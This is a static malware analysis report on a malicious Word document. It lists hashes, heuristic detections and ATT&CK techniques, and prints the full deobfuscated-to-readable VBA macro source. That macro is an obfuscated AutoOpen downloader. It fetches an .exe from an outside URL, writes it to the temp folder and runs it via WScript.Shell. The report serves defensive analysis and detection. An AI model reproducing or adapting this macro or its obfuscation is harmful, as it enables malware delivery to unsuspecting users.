Malicious Office (OLE) / .DOC — malware analysis report

Static analysis result for SHA-256 108bdbc031bc05bf…

MALICIOUS

Office (OLE) / .DOC

44.0 KB Created: 2014-09-03 17:55:00 Authoring application: Microsoft Office Word First seen: 2022-11-25
MD5: 376fa3684461224fbf1d998672ac4921 SHA-1: 0a7d654ef39c5531851d11be3ecfaacd477fa602 SHA-256: 108bdbc031bc05bf907f3c5387bf16052ed037220597107fe0a3e3e40070de5c
170 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample contains VBA macros, including an AutoOpen subroutine, which is a common technique for executing malicious code upon opening a document. The script utilizes CreateObject to instantiate 'Msxml2.XMLHTTP' and attempts to download a file from the URL 'http://www.helios.vn/98jh6d5/89hg56fd.exe'. This indicates a downloader or droppper functionality.

Heuristics 7

  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set alaskan = CreateObject(melocactus)
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    aesthetic = CallByName(alaskan, "open", VbMethod, ppepare, tron, False)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.helios.vn/98jh6d5/89hg56fd.exe In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4373 bytes
SHA-256: 2d2d741a14808907b210a43e7633c3d5042cf7e504d6fd04176fe44c91ca895b
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Main"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub bonn()
Dim cannaceae As Variant
Dim bedimmed As Long
Dim cristobalite As Object

ranged.disquietude
End Sub

Sub AutoOpen()
hideously = #5:59:31 AM#

mohican = Hour(hideously)
If mohican < 3 Then
ranged.countAs (23)
Else
bonn
End If
End Sub

Attribute VB_Name = "gnashing"

Private Sub DeleteComments()
    Dim curDoc As Word.Document = WordApp.ActiveDocument
    curDoc.DeleteAllComments()
    Marshal.ReleaseComObject (curDoc)
End Sub

Function alaskan()
On Error Resume Next
melocactus = "Msxm" + StrReverse("HLMX.2l") + Mid("abderiteTTPsilverweed", 9, 3)
Set alaskan = CreateObject(melocactus)
tron = Black.Hole
ppepare = StrReverse("TEG")
aesthetic = CallByName(alaskan, "open", VbMethod, ppepare, tron, False)
diligent = 32 + 85 - 25
myxosporidian = 17 + 23 + 26
If diligent + myxosporidian > 36 Then
overthrow = "di" + Left("shdaggle", 2) + ""
End If

alaskan.send
GoTo citadel
vigilantly:
alaskan = 0
citadel:
End Function

Function homophone(deerskin, diplomacy)
noise = 97 + 58 - 154
raceabout = ranged.community
risqu = Left(raceabout, 2)
melocactus = risqu + "o" + "db." + "Stream"
Set catabolic = CreateObject(melocactus)
balefully = CallByName(catabolic, "Open", VbMethod)
catabolic.Type = 52 + 22 - 73
aesthetic = CallByName(catabolic, Mid("arguerWrbrawler", 7, 2) + "ite" + Right("pupa", 0) + Left("meadowlark", 0), noise, deerskin.responseBody)
geist = 29 + 35
affirmative = 46 + 16
If geist + affirmative > 16 Then
messianic = Right("disestablishmentti", 2) + Mid("afibrinogenemianamidaedoubtfulness", 16, 7)
End If

nocens = CallByName(catabolic, "Sav" + Left("eToFimultarum", 5) + Mid("exocentriclemime", 11, 2), VbMethod, diplomacy, 54 - 52 - 1)
End Function



Attribute VB_Name = "ranged"

Function countAs(theRange) As Integer
  'Given a range of cells, counts how many As Are in that range
  Dim curVal
  
  countAs = 0
  
  For Each curVal In theRange
    'MsgBox curVal
    If InStr(curVal, "A") Then
      countAs = countAs + 1
    End If
  Next
  
End Function


Public Function community() As String
Dim divert As String
Dim diller As Variant
Dim schematically As String
community = ActiveDocument.BuiltInDocumentProperties("Author")
End Function

Function countFs(theRange) As Integer
  'Given a range of cells, counts how many As Are in that range
  Dim curVal
  
  countFs = 0
  
  For Each curVal In theRange
    'MsgBox curVal
    If InStr(curVal, "F") Then
      countFs = countFs + 1
    End If
  Next
  
End Function


Sub disquietude()
Dim toity As Variant
Dim environs As String
Dim edibility As String
amoebida = "buffoonery.exe"

criminative = Mid("nuesExpamoselle", 5, 4) + Left("ndEnvirounpresentable", 8) + "nmentStrings"
Dim caraffe As String
Set cygnus = CreateObject("WScr" + "ipt.She" + Mid("mousseuxllkazak", 9, 2) + Mid("saintbernard'slilybushy", 19, 0))
adnate = 98 + 67 - 111
cleared = 112 - 77 + 63
If adnate + cleared > 29 Then
Brightness = "ab" + "rogation"
End If

environs = CallByName(cygnus, criminative, 1, "%temp%")
legume = 84 - 86 + 69
durity = 28 + 123 - 80
If legume + durity > 76 Then
misreport = StrReverse("op") + Right("disestimationther", 4) + "b"
End If

edibility = environs & "\pcriminology" & amoebida
Set tontine = gnashing.alaskan
pleader = #6:17:39 AM#
ly = Hour(pleader)

calvaria = gnashing.homophone(tontine, edibility)
zoroastrianism = #3:03:43 AM#
bruise = Hour(zoroastrianism)

lamblike = 72 - 46 - 6
distored = 40 + 24
For lamblike = 72 - 46 - 6 To 40 + 24
curly = StrReverse("ba") + Mid("mollycoddlesorbunclog", 12, 4) + Left("edastray", 2)
Next lamblike

trend = CallByName(cygnus, "Run", VbMethod, edibility)
End Sub

Attribute VB_Name = "Black"
Attribute VB_Base = "0{FC45D493-DFA3-410C-ADBC-23EDDAAB9529}{A7FD49FC-3E7D-4AC7-AED1-2B875C728B41}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False